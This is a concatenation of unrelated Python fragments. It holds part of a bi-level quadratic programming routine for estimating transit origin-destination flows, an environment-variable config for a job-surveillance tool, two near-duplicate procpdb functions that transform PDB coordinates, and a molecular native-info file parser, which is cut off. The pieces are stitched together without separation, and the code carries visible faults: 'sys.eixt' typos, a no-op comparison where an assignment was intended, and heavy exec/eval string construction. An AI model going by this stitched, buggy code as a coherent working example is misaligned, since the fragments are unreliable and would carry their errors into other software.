* T + N * t1 + i_stop, 0] = (-2) * passby_count[N * k_meas + i_stop] # A # A will be fully determined in the iterations. # Initialized here. A = np.zeros((3 * N * T, N * N * T + 3 * N * T)) # b is zero as default. b = np.zeros((3 * N * T, 1)) # G # var >= 0, namely - var <= 0. G = (-1) * np.identity(N * N * T + 3 * N * T) # h is zero as default. 
h = np.zeros((N * N * T + 3 * N * T, 1)) # Transform numpy matrices to cvxopt matrices. Q = matrix(Q, tc='d') p = matrix(p, tc='d') G = matrix(G, tc='d') h = matrix(h, tc='d') b = matrix(b, tc='d') # Mixed integer prog. # Sparse model. elif QUADRATIC_PROG_SOLVING_PKG == "gurobi" and platform.system( ) != 'Windows': m = Model("qp") # Create variables # f_i_j_h for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): if INTEGER_PROG == 1: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.INTEGER, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) elif INTEGER_PROG == 0: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) # o_q_h for q_origin in range(N): for h_depart in range(T): exec( "o_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='o_%d_%d')" % (q_origin, h_depart, q_origin, h_depart), globals()) # d_r_t for r_dest in range(N): for t in range(T): exec( "d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='d_%d_%d')" % (r_dest, t, r_dest, t), globals()) # x_i_t for i_stop in range(N): for t in range(T): exec( "x_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='x_%d_%d')" % (i_stop, t, i_stop, t), globals()) # Set objective obj_str = 'obj = ' for k_meas in range(I): # o_q_h for q_origin in range(N): temp_str = '(' for h_depart in range(C * k_meas, C * (k_meas + 1)): temp_str += 'o_' + str(q_origin) + '_' + str(h_depart) if h_depart != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str(entry_count[N * k_meas + q_origin]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # d_r_t for r_dest in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'd_' + str(r_dest) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str(exit_count[N * k_meas + r_dest]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # x_i_t 
for i_stop in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'x_' + str(i_stop) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str(passby_count[N * k_meas + i_stop]) temp_str += ')' obj_str += temp_str + '*' + temp_str if not (i_stop == (N - 1) and k_meas == (I - 1)): obj_str += ' + ' if TEST_QUADRATIC_PROG == 1: print() print(" objective is:") print(obj_str) # End of test print. exec(obj_str, globals()) m.setObjective(obj, GRB.MINIMIZE) # Add constraints (part). count_constraint = 0 # o_q_h for q_origin in range(N): for h_depart in range(T): const_str = '' temp_count = 0 for r_dest in range(N): if r_dest != q_origin: if temp_count != 0: const_str += ' + ' const_str += 'f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'o_' + str(q_origin) + '_' + str(h_depart) if TEST_QUADRATIC_PROG == 1: print() print(" A entry count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # d_r_t # TBD # x_r_t # TBD elif QUADRATIC_PROG_SOLVING_PKG == "gurobi" and platform.system( ) == 'Windows': pass elif QUADRATIC_PROG_SOLVING_PKG != "cvxopt" and QUADRATIC_PROG_SOLVING_PKG != "gurobi": print() print(" Error: Unkown method!") sys.exit(1) print(' --------------------------') print(' Bi-level programming iterations begins ... ') # Bi-level programming iterations # Initialization iteration_count = 0 converg_flag = 0 # While convergence or maximum, iteration not reached, continue to loop. while converg_flag == 0: # Upper level print() print(" Bi-level iteration: " + str(iteration_count)) print(' Upper level begins ...') print(" Find initial od_flow_to_stop_prob...") # Initialize the cost of links for index in range(len(tn.links_exp)): tn.links_exp[index][8] = tn.links_exp[index][5] # Initialize od_flow_to_stop_prob. 
# Users will follow the path determined by the initial preference set. # No capacity constraints etc. considered. if iteration_count == 0: prefer_links_optimal, prefer_probs_optimal = find_initial_strategy( tn) od_flow_to_stop_prob = np.zeros((N, N, T, N, T)) for q_origin in range(N): for r_dest in range(N): if q_origin != r_dest: for h_depart in range(T): # Initialize departure node in TE network. # Notations inherated from dynamic_schedule_based_ue_assignment_algorithm. i = q_origin t = h_depart i_t = tn.stops_exp.index(tn.stops[q_origin] + '_' + str(h_depart)) # coming from route l = num_choices - 1 tau = h_depart arrive_dest_flag = 0 while arrive_dest_flag == 0: if TEST_QUADRATIC_PROG == 1: print() print(" Current [q,r,h]: " + str([q_origin, r_dest, h_depart]) + " current node: " + str(tn.stops_exp[i_t]) + " - " + str(i_t)) print(" prefer_links_optimal:") print(prefer_links_optimal[r_dest, l, tau, i_t]) # End of test print. # Update od_flow_to_stop_prob for current node. if i == q_origin and t == h_depart: od_flow_to_stop_prob[q_origin, r_dest, h_depart, i, t] = 1.0 if TEST_QUADRATIC_PROG == 1: print() print( " Entry count od_flow_to_stop_prob" + str([ q_origin, r_dest, h_depart, i, t ]) + " updated to 1.") # End of test print. if i == r_dest: od_flow_to_stop_prob[q_origin, r_dest, h_depart, i, t] = 1.0 if TEST_QUADRATIC_PROG == 1: print() print( " Exit count od_flow_to_stop_prob" + str([ q_origin, r_dest, h_depart, i, t ]) + " updated to 1.") # End of test print. if i != q_origin and i != r_dest and l != ( num_choices - 1): od_flow_to_stop_prob[q_origin, r_dest, h_depart, i, t] = 1.0 if TEST_QUADRATIC_PROG == 1: print() print( " Passby count od_flow_to_stop_prob" + str([ q_origin, r_dest, h_depart, i, t ]) + " updated to 1.") # End of test print. # Update arrive_dest_flag if needed. if i == r_dest: arrive_dest_flag == 1 if TEST_QUADRATIC_PROG == 1: print() print(" Arrive at destination.") # End of test print. break # Find next node. 
# If preference set not empty, which means it's able to get to the destination in T; if prefer_links_optimal[r_dest, l, tau, i_t]: link_next = prefer_links_optimal[r_dest, l, tau, i_t][0] l_next = tn.links_exp[link_next][1] i_t_next = tn.links_exp[link_next][3] i_next = tn.stops_exp_2[i_t_next][1] t_next = tn.stops_exp_2[i_t_next][2] if l_next == (num_choices - 1): tau_next = tau else: # Use TT to update tau. tau_next = t_next else: if TEST_QUADRATIC_PROG == 1: print() print( " This node cannot reach destination within horizon." ) # End of test print. break # Update node. i_t = i_t_next i = i_next t = t_next l = l_next tau = tau_next if QUADRATIC_PROG_SOLVING_PKG == "cvxopt": # A # Adopt od_flow_to_stop_prob matrix from assignment of last iteration to obtain A. # For enter measurement at node r_h_depart for h_depart in range(T): for q_origin in range(N): # flow var coeff for r_dest in range(N): A[N * h_depart + q_origin, N * N * h_depart + N * q_origin + r_dest] = 1 # Measurement var (O) coeff A[N * h_depart + q_origin, N * N * T + N * h_depart + q_origin] = -1 # For exit measurement at node s_t for t_exit in range(T): for r_dest in range(N): # flow var coeff for q_origin in range(N): for h_depart in range(t_exit): if q_origin != r_dest: A[N * T + N * t_exit + r_dest, N * N * h_depart + N * q_origin + r_dest] = od_flow_to_stop_prob[q_origin, r_dest, h_depart, r_dest, t_exit] # Measurement var (D) coeff # Remember to use t! A[N * T + N * t_exit + r_dest, N * N * T + N * T + N * t_exit + r_dest] = -1 # For passby measurement at node n_t for i_stop in range(N): for t_passby in range(T): # Q # Note that enter flows could also be detedted by wifi, hence here # h_depart range in 0 ~ t. 
for h_depart in range(t_passby): for q_origin in range(N): for r_dest in range(N): if i_stop != q_origin and i_stop != r_dest: A[2 * N * T + N * t_passby + i_stop, N * N * h_depart + N * q_origin + r_dest] = od_flow_to_stop_prob[q_origin, r_dest, h_depart, i_stop, t_passby] # Measuremnt var (X) coeff # Remember to use t! A[2 * N * T + N * t_passby + i_stop, N * N * T + 2 * N * T + N * t_passby + i_stop] = -1 print() print(' Quadratic programming solver begins ...') # Transform numpy matrix to cvxopt matrix A = matrix(A, tc='d') sol = solvers.qp(Q, p, G, h, A, b) print() print(' Solver finished once!') print(' Slover status:') print(sol['status']) # 'sol' is dictionary # Key: 'status', 'x', 'primal objective' if sol['status'] == 'optimal': print() optimal_objective = sol['primal objective'] # Add constants neglected in optimization. for k_meas in range(I): for i_stop in range(N): optimal_objective += entry_count[N * k_meas + i_stop]**2 optimal_objective += exit_count[N * k_meas + i_stop]**2 optimal_objective += passby_count[N * k_meas + i_stop]**2 print("Optimal objective " + str(optimal_objective)) for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): od_flow[q_origin, r_dest, h_depart] = sol['x'][N * N * h_depart + N * q_origin + r_dest] else: print() print(' Error: no optimal solution found!') # Stop iteration sys.eixt(1) # Sparse matrix elif QUADRATIC_PROG_SOLVING_PKG == "gurobi": # If the platform is Win, objective and constraints should be added. 
if platform.system() == 'Windows': m = Model("qp") # Create variables # f_i_j_h for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): if INTEGER_PROG == 1: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.INTEGER, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) elif INTEGER_PROG == 0: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) # o_q_h for q_origin in range(N): for h_depart in range(T): exec( "o_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='o_%d_%d')" % (q_origin, h_depart, q_origin, h_depart), globals()) # d_r_t for r_dest in range(N): for t in range(T): exec( "d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='d_%d_%d')" % (r_dest, t, r_dest, t), globals()) # x_i_t for i_stop in range(N): for t in range(T): exec( "x_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='x_%d_%d')" % (i_stop, t, i_stop, t), globals()) # Set objective obj_str = 'obj = ' for k_meas in range(I): # o_q_h for q_origin in range(N): temp_str = '(' for h_depart in range(C * k_meas, C * (k_meas + 1)): temp_str += 'o_' + str(q_origin) + '_' + str( h_depart) if h_depart != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str( entry_count[N * k_meas + q_origin]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # d_r_t for r_dest in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'd_' + str(r_dest) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str( exit_count[N * k_meas + r_dest]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # x_i_t for i_stop in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'x_' + str(i_stop) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str( passby_count[N * k_meas + i_stop]) temp_str += ')' obj_str += temp_str + '*' 
+ temp_str if not (i_stop == (N - 1) and k_meas == (I - 1)): obj_str += ' + ' if TEST_QUADRATIC_PROG == 1: print() print(" objective is:") print(obj_str) # End of test print. exec(obj_str, globals()) m.setObjective(obj, GRB.MINIMIZE) # Add constraints (part). count_constraint = 0 # o_q_h for q_origin in range(N): for h_depart in range(T): const_str = '' temp_count = 0 for r_dest in range(N): if r_dest != q_origin: if temp_count != 0: const_str += ' + ' const_str += 'f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'o_' + str(q_origin) + '_' + str( h_depart) if TEST_QUADRATIC_PROG == 1: print() print( " A entry count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # If the sys is not Win, delete dated constraints. if platform.system() != 'Windows' and iteration_count != 0: m.remove(m.getConstrs()[N * T:3 * N * T]) # Add other constraints in the following. count_constraint = N * T # d_r_t for r_dest in range(N): for t in range(1, T): const_str = '' temp_count = 0 for q_origin in range(N): for h_depart in range(T): if q_origin != r_dest and h_depart < t: if od_flow_to_stop_prob[q_origin, r_dest, h_depart, r_dest, t] > 0.0001: if temp_count != 0: const_str += ' + ' const_str += str( od_flow_to_stop_prob[q_origin, r_dest, h_depart, r_dest, t] ) + ' * f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'd_' + str(r_dest) + '_' + str(t) if TEST_QUADRATIC_PROG == 1: print() print(" A exit count constraint is added: ") print(const_str) # End of test print. 
m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # x_i_t for i_stop in range(N): for t in range(T): const_str = '' temp_count = 0 for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): if i_stop != q_origin and i_stop != r_dest and t > h_depart and od_flow_to_stop_prob[ q_origin, r_dest, h_depart, i_stop, t] > 0.0001: if temp_count != 0: const_str += ' + ' const_str += str( od_flow_to_stop_prob[q_origin, r_dest, h_depart, i_stop, t] ) + ' * f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'x_' + str(i_stop) + '_' + str(t) if TEST_QUADRATIC_PROG == 1: print() print(" A passby count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # Optimize model m.optimize() print(' Obj: %g' % m.objVal) if iteration_count == 0: with open("results/dynamic/obj_upper_level.csv", "w") as f: f.write(str(m.objVal)) else: with open("results/dynamic/obj_upper_level.csv", "a") as f: f.write('\n') f.write(str(m.objVal)) # Obtain results for v in m.getVars(): temp_name = v.varName temp_name = temp_name.split('_') if temp_name[0] == 'f': od_flow[int(temp_name[1]), int(temp_name[2]), int(temp_name[3])] = v.x # Save results np.save( 'results/dynamic/od_flow_upper_level_iteration_' + str(iteration_count), od_flow) print() print(' The optimal od_flow obtained!') # Lower level - Solving dynamic schedule based UE assignment problem. print(' Lower level begins ...') # If this is not a test, then update od_flow_to_stop_prob. 
if (TEST_QUADRATIC_PROG != 1): od_flow_to_stop_prob, link_combined_flow = dynamic_schedule_based_ue_assignment_algorithm( tn, od_flow, od_flow_to_stop_prob) #np.save('results/dynamic/od_flow_to_stop_prob_upper_level_iteration_' + str(iteration_count), od_flow_to_stop_prob) np.save( 'results/dynamic/link_combined_flow_upper_level_iteration_' + str(iteration_count), link_combined_flow) else: print() print( " Testing quadratic prog; od_flow_to_stop_prob is not updated." ) # Convergence test. if iteration_count >= 1: avg_mse_od_flow = 0 for r in range(N): for s in range(N): for h_depart in range(T): avg_mse_od_flow += (od_flow_last[r, s, h_depart] - od_flow[r, s, h_depart])**2 #if abs(od_flow_last[r,s,h_depart] - od_flow[r,s,h_depart]) > 0.1: # print() # print(" od_flow_last" + str([r,s,h_depart]) + ": " + str(od_flow_last[r,s,h_depart])) # print(" od_flow" + str([r,s,h_depart]) + ": " + str(od_flow[r,s,h_depart])) avg_mse_od_flow /= N * N * T print() print(" Iteration: " + str(iteration_count) + " avg_mse_od_flow: " + str(avg_mse_od_flow)) if iteration_count == 1: with open("results/dynamic/avg_mse_od_flow_upper_level.csv", 'w') as f: f.write(str(avg_mse_od_flow)) else: with open("results/dynamic/avg_mse_od_flow_upper_level.csv", 'a') as f: f.write('\n') f.write(str(avg_mse_od_flow)) avg_mse_link_flow = 0 for link_index in range(len(link_combined_flow)): avg_mse_link_flow += (link_combined_flow_last[link_index] - link_combined_flow[link_index])**2 #if abs(link_combined_flow_last[link_index] - link_combined_flow[link_index]) > 0.1: # print() # print(" link_combined_flow_last" + str([link_index]) + ": " + str(link_combined_flow_last[link_index])) # print(" link_combined_flow" + str([link_index]) + ": " + str(link_combined_flow[link_index])) avg_mse_link_flow /= len(link_combined_flow) print() print(" Iteration: " + str(iteration_count) + " avg_mse_link_flow: " + str(avg_mse_link_flow)) if iteration_count == 1: with 
open("results/dynamic/avg_mse_link_flow_upper_level.csv", 'w') as f: f.write(str(avg_mse_link_flow)) else: with open("results/dynamic/avg_mse_link_flow_upper_level.csv", 'a') as f: f.write('\n') f.write(str(avg_mse_link_flow)) if avg_mse_od_flow < CONVERGENCE_CRITERION and avg_mse_link_flow < CONVERGENCE_CRITERION: print() print("Convergence reached!") converg_flag = 1 continue od_flow_last = deepcopy(od_flow) link_combined_flow_last = deepcopy(link_combined_flow) if iteration_count >= MAX_NUMBER_OF_ITERATIONS: print() print(' Warning! bi-level prog not converging at ' + str(MAX_NUMBER_OF_ITERATIONS) + 'th iteration!') sys.exit(1) iteration_count += 1 return od_flow
""" set environment variables. """ import os import sys # root path for job_surveillance dir PATH = None # user name USER = None # user email address USER_EMAIL = None # fake email address from which sending email # to users. SERVER_EMAIL = None # initial environment var PATH = os.environ['JOB_SVLN_PATH'].rstrip('/') + '/' PATH = os.path.expanduser(PATH) if not os.path.isdir(PATH): print "Terminated: JOB_SVLN_PATH is not valid!\n" sys.eixt() USER = os.environ['JOB_SVLN_USER'] USER_EMAIL = os.environ['JOB_SVLN_USER_EMAIL'] SERVER_EMAIL = os.environ['JOB_SVLN_SERVER_EMAIL']
def main():
    """Parse command-line options describing a rigid transform and apply
    it to a PDB file: read args[0], transform atom coordinates, write args[1].

    Raises:
        Exception: when --matrix/--trans are not comma-separated floats, or
            when the chosen convention's parameters do not form a valid
            Transform.
    """
    progname = os.path.basename(sys.argv[0])
    usage = """Usage:\nprocpdb.py <input>\nprocpdb.py <input> <output> [rot=<alt,az,phi>] [trans=<dx,dy,dz>] [centeratoms] [centerelec] [centermass] [apix=<A/pixel>]\n."""
    parser = EMArgumentParser(usage=usage, version=EMANVERSION)

    ####################
    parser.add_argument("--animorph", "-AN", type=str, help="This will use a morph vector file (segment3d) to morph atom positions,#P [animorph=<n>,<apix>,<vecfile>]", default=None)
    parser.add_argument("--apix", "-A", type=float, help="apix", default=1.0)
    parser.add_argument("--scale", "-S", type=float, help="scale", default=1.0)
    parser.add_argument("--center", "-C", type=str, help="center of the rotation, (0,0,0)", default='0.0,0.0,0.0')
    parser.add_argument("--chains", type=str, help="String list of chain identifiers to include, eg 'ABEFG'", default=None)
    parser.add_argument("--trans", "-TR", type=str, help="transform, (0,0,0)", default='0,0,0')
    parser.add_argument("--include", type=str, help="savetype", default=["helix", "sheet", "other"])
    parser.add_argument("--mirror", type=bool, help="mirror", default='False')
    # matrix
    parser.add_argument("--matrix", "-matrix", type=str, help="transform matrix.", default='0,0,0,0,0,0,0,0,0,0,0,0')
    parser.add_argument("--rot", type=str, metavar="az,alt,phi or convention:par=val:...", help="Rotate map. Specify az,alt,phi or convention:par=val:par=val:... eg - mrc:psi=22:theta=15:omega=7", action="append", default=None)
    parser.add_argument("--type", "-T", type=str, help="convention type", default='eman')
    # eman input, default setting
    parser.add_argument("--az", "-az", type=float, help="az in eman convention.", default=0)
    parser.add_argument("--alt", "-alt", type=float, help="alt in eman convention.", default=0)
    parser.add_argument("--phi", "-phi", type=float, help="phi.", default=0)
    # imagic
    parser.add_argument("--alpha", "-alpha", type=float, help="alpha in imagic convention.", default=0)
    parser.add_argument("--beta", "-beta", type=float, help="beta in imagic convention.", default=0)
    parser.add_argument("--gamma", "-gamma", type=float, help="gamma in imagic convention.", default=0)
    # spider
    parser.add_argument("--theta", "-theta", type=float, help="theta.", default=0)
    parser.add_argument("--psi", "-psi", type=float, help="psi in spider convention.", default=0)
    # xyz
    parser.add_argument("--xtilt", "-xtilt", type=float, help="xtilt in xyz convention.", default=0)
    parser.add_argument("--ytilt", "-ytilt", type=float, help="ytilt in xyz convention.", default=0)
    parser.add_argument("--ztilt", "-ztilt", type=float, help="ztilt in xyz convention.", default=0)
    # mrc
    parser.add_argument("--omega", "-omega", type=float, help="omega.", default=0)
    # quaternion
    parser.add_argument("--e0", "-e0", type=float, help="e0 in quaternion convention.", default=0)
    parser.add_argument("--e1", "-e1", type=float, help="e1 in quaternion convention.", default=0)
    parser.add_argument("--e2", "-e2", type=float, help="e2 in quaternion convention.", default=0)
    parser.add_argument("--e3", "-e3", type=float, help="e3 in quaternion convention.", default=0)
    # spin
    parser.add_argument("--n1", "-n1", type=float, help="n1.", default=0)
    parser.add_argument("--n2", "-n2", type=float, help="n2.", default=0)
    parser.add_argument("--n3", "-n3", type=float, help="n3.", default=0)
    # sigrot
    parser.add_argument("--q", "-q", type=float, help="q in sgirot convention.", default=0)

    (options, args) = parser.parse_args()
    if len(args) < 2:
        parser.error("Input and output files required")
        sys.exit(1)  # was sys.eixt(1); unreachable after parser.error, kept defensively

    mat = options.matrix.split(',')
    try:
        mat = [float(i) for i in mat]
    except ValueError:
        # was "%s" % optstr: optstr is undefined -> NameError masked the real message
        raise Exception("Invalid Input: %s" % options.matrix)

    trans = options.trans.split(',')
    try:
        trans = [float(i) for i in trans]
    except ValueError:
        raise Exception("Invalid Input: %s" % options.trans)

    parms = {"type": options.type,
             "tx": trans[0], "ty": trans[1], "tz": trans[2],
             "scale": options.scale, "mirror": options.mirror}

    # Per-convention parameter names copied from options into parms.
    type_keys = {
        "eman": ("az", "alt", "phi"),
        "imagic": ("alpha", "beta", "gamma"),
        "spider": ("phi", "theta", "psi"),
        "xyz": ("xtilt", "ytilt", "ztilt"),
        "mrc": ("phi", "theta", "omega"),
        "quaternion": ("e0", "e1", "e2", "e3"),
        "spin": ("omega", "n1", "n2", "n3"),
        "sgirot": ("n1", "n2", "n3", "q"),
    }

    if options.rot is None:
        if options.type == "matrix":
            t = Transform(mat)
        elif options.type in type_keys:
            for key in type_keys[options.type]:
                parms[key] = getattr(options, key)
            try:
                t = Transform(parms)
            except Exception:
                raise Exception("Invalid transform: %s" % parms)
        else:
            print("get error, please input the right convention, example eman, imagic, spider, mrc, xyz, sgirot, quaternion, matrix")
    else:
        # Explicit --rot string overrides every per-convention option.
        t = parse_transform(options.rot[0])

    with open(args[0], 'r') as inp:
        lines = inp.readlines()
    outputlines = pdb_transform(t, lines, options.center, options.include,
                                options.animorph, options.apix,
                                options.chains, trans)
    with open(args[1], "w") as out:
        for i in outputlines:
            out.write(i)
def main():
    """Parse transform options and apply the transform to a PDB file
    (Python-2 era variant of procpdb's entry point; kept 2/3-neutral).

    Reads args[0], transforms atom coordinates, writes args[1].
    Raises Exception on malformed --matrix/--trans values or an invalid
    parameter set for the chosen rotation convention.
    """
    progname = os.path.basename(sys.argv[0])
    usage = """Usage:\nprocpdb.py <input>\nprocpdb.py <input> <output> [rot=<alt,az,phi>] [trans=<dx,dy,dz>] [centeratoms] [centerelec] [centermass] [apix=<A/pixel>]\n."""
    parser = EMArgumentParser(usage=usage, version=EMANVERSION)

    ####################
    parser.add_argument("--animorph", "-AN", type=str, help="This will use a morph vector file (segment3d) to morph atom positions,#P [animorph=<n>,<apix>,<vecfile>]", default=None)
    parser.add_argument("--apix", "-A", type=float, help="apix", default=1.0)
    parser.add_argument("--scale", "-S", type=float, help="scale", default=1.0)
    parser.add_argument("--center", "-C", type=str, help="center of the rotation, (0,0,0)", default='0.0,0.0,0.0')
    parser.add_argument("--chains", type=str, help="String list of chain identifiers to include, eg 'ABEFG'", default=None)
    parser.add_argument("--trans", "-TR", type=str, help="transform, (0,0,0)", default='0,0,0')
    parser.add_argument("--include", type=str, help="savetype", default=["helix", "sheet", "other"])
    parser.add_argument("--mirror", type=bool, help="mirror", default='False')
    parser.add_argument("--type", "-T", type=str, help="convention type", default='eman')
    # eman input, default setting
    parser.add_argument("--az", "-az", type=float, help="az in eman convention.", default=0)
    parser.add_argument("--alt", "-alt", type=float, help="alt in eman convention.", default=0)
    parser.add_argument("--phi", "-phi", type=float, help="phi.", default=0)
    # imagic
    parser.add_argument("--alpha", "-alpha", type=float, help="alpha in imagic convention.", default=0)
    parser.add_argument("--beta", "-beta", type=float, help="beta in imagic convention.", default=0)
    parser.add_argument("--gamma", "-gamma", type=float, help="gamma in imagic convention.", default=0)
    # spider
    parser.add_argument("--theta", "-theta", type=float, help="theta.", default=0)
    parser.add_argument("--psi", "-psi", type=float, help="psi in spider convention.", default=0)
    # xyz
    parser.add_argument("--xtilt", "-xtilt", type=float, help="xtilt in xyz convention.", default=0)
    parser.add_argument("--ytilt", "-ytilt", type=float, help="ytilt in xyz convention.", default=0)
    parser.add_argument("--ztilt", "-ztilt", type=float, help="ztilt in xyz convention.", default=0)
    # mrc
    parser.add_argument("--omega", "-omega", type=float, help="omega.", default=0)
    # quaternion
    parser.add_argument("--e0", "-e0", type=float, help="e0 in quaternion convention.", default=0)
    parser.add_argument("--e1", "-e1", type=float, help="e1 in quaternion convention.", default=0)
    parser.add_argument("--e2", "-e2", type=float, help="e2 in quaternion convention.", default=0)
    parser.add_argument("--e3", "-e3", type=float, help="e3 in quaternion convention.", default=0)
    # spin
    parser.add_argument("--n1", "-n1", type=float, help="n1.", default=0)
    parser.add_argument("--n2", "-n2", type=float, help="n2.", default=0)
    parser.add_argument("--n3", "-n3", type=float, help="n3.", default=0)
    # sigrot
    parser.add_argument("--q", "-q", type=float, help="q in sgirot convention.", default=0)
    # matrix
    parser.add_argument("--matrix", "-matrix", type=str, help="transform matrix.", default='0,0,0,0,0,0,0,0,0,0,0,0')
    parser.add_argument("--rot", type=str, metavar="az,alt,phi or convention:par=val:...", help="Rotate map. Specify az,alt,phi or convention:par=val:par=val:... eg - mrc:psi=22:theta=15:omega=7", action="append", default=None)

    (options, args) = parser.parse_args()
    if len(args) < 2:
        parser.error("Input and output files required")
        sys.exit(1)  # was sys.eixt(1); unreachable after parser.error, kept defensively

    mat = options.matrix.split(',')
    try:
        mat = [float(i) for i in mat]
    except ValueError:
        # was "%s" % optstr: optstr is undefined -> NameError masked the real message.
        # raise Exception(...) call form is valid in both Python 2 and 3.
        raise Exception("Invalid Input: %s" % options.matrix)

    trans = options.trans.split(',')
    try:
        trans = [float(i) for i in trans]
    except ValueError:
        raise Exception("Invalid Input: %s" % options.trans)

    parms = {"type": options.type,
             "tx": trans[0], "ty": trans[1], "tz": trans[2],
             "scale": options.scale, "mirror": options.mirror}

    # Per-convention parameter names copied from options into parms.
    type_keys = {
        "eman": ("az", "alt", "phi"),
        "imagic": ("alpha", "beta", "gamma"),
        "spider": ("phi", "theta", "psi"),
        "xyz": ("xtilt", "ytilt", "ztilt"),
        "mrc": ("phi", "theta", "omega"),
        "quaternion": ("e0", "e1", "e2", "e3"),
        "spin": ("omega", "n1", "n2", "n3"),
        "sgirot": ("n1", "n2", "n3", "q"),
    }

    if options.rot is None:
        if options.type == "matrix":
            t = Transform(mat)
        elif options.type in type_keys:
            for key in type_keys[options.type]:
                parms[key] = getattr(options, key)
            try:
                t = Transform(parms)
            except Exception:
                raise Exception("Invalid transform: %s" % parms)
        else:
            print("get error, please input the right convention, example eman, imagic, spider, mrc, xyz, sgirot, quaternion, matrix")
    else:
        # Explicit --rot string overrides every per-convention option.
        t = parse_transform(options.rot[0])

    inp = open(args[0], 'r')
    lines = inp.readlines()
    inp.close()
    outputlines = pdb_transform(t, lines, options.center, options.include,
                                options.animorph, options.apix,
                                options.chains, trans)
    out = open(args[1], "w")
    for i in outputlines:
        out.write(i)
    out.close()
def read_all(self, ni):
    """Read every record from the native-info file and populate *ni*.

    The file is scanned in several passes (seek(0) between them):
      1. simple one-line records (bond, fene, angl, dihd, contact, LJ,
         basestack, basepair);
      2. 'bs-dist' (BaseStackDT) records, then their 'bs-dihd' dihedrals;
      3. 'tbs-dist' (TertiaryStackDT) records, then 'tbs-angl'/'tbs-dihd';
      4. 'hb-dist' (HBondDT) records, then 'hb-angl'/'hb-dihd'.
    After each multi-part section completeness is verified; a missing or
    surplus sub-record prints an error and exits with status 2.
    """
    # Field layouts shared by every angle/dihedral sub-record;
    # order matches the token order on the file line.
    ANG_INTS = ('id', 'iunit1', 'iunit2', 'imp1', 'imp2', 'imp3',
                'imp1un', 'imp2un', 'imp3un')
    DIH_INTS = ('id', 'iunit1', 'iunit2', 'imp1', 'imp2', 'imp3', 'imp4',
                'imp1un', 'imp2un', 'imp3un', 'imp4un')

    def _fill(rec, tag, int_fields, itr, with_type=False):
        # Populate <tag>_<field> attributes of *rec* from the token iterator:
        # the int fields, then native (float), coef (float), optionally type.
        for f in int_fields:
            setattr(rec, '%s_%s' % (tag, f), int(next(itr)))
        setattr(rec, tag + '_native', float(next(itr)))
        setattr(rec, tag + '_coef', float(next(itr)))
        if with_type:
            setattr(rec, tag + '_type', next(itr))

    def _scan(keyword, records, tags, int_fields, with_type, full_msg):
        # One pass over the file: for every <keyword> line, find the matching
        # record(s) by id and fill the first still-empty slot among *tags*.
        # If every slot is already occupied the input is malformed: exit(2).
        self._file.seek(0)
        klen = len(keyword)
        for line in self._file:
            if line[0:klen] != keyword:
                continue
            itr = iter(line.split())
            next(itr)                  # skip the keyword token itself
            rec_id = int(next(itr))
            for rec in records:
                if rec.id != rec_id:
                    continue
                for tag in tags:
                    if getattr(rec, tag + '_id') is None:
                        _fill(rec, tag, int_fields, itr, with_type)
                        break
                else:
                    print(full_msg)
                    sys.exit(2)

    # --- pass 1: simple one-line records ------------------------------
    self._file.seek(0)
    for line in self._file:
        if line[0:4] == 'bond':
            ni.bondlengths.append(line2bondlength(line))
        elif line[0:4] == 'fene':
            ni.fenes.append(line2fene(line))
        elif line[0:4] == 'angl':
            ni.bondangles.append(line2bondangle(line))
        elif line[0:4] == 'dihd':
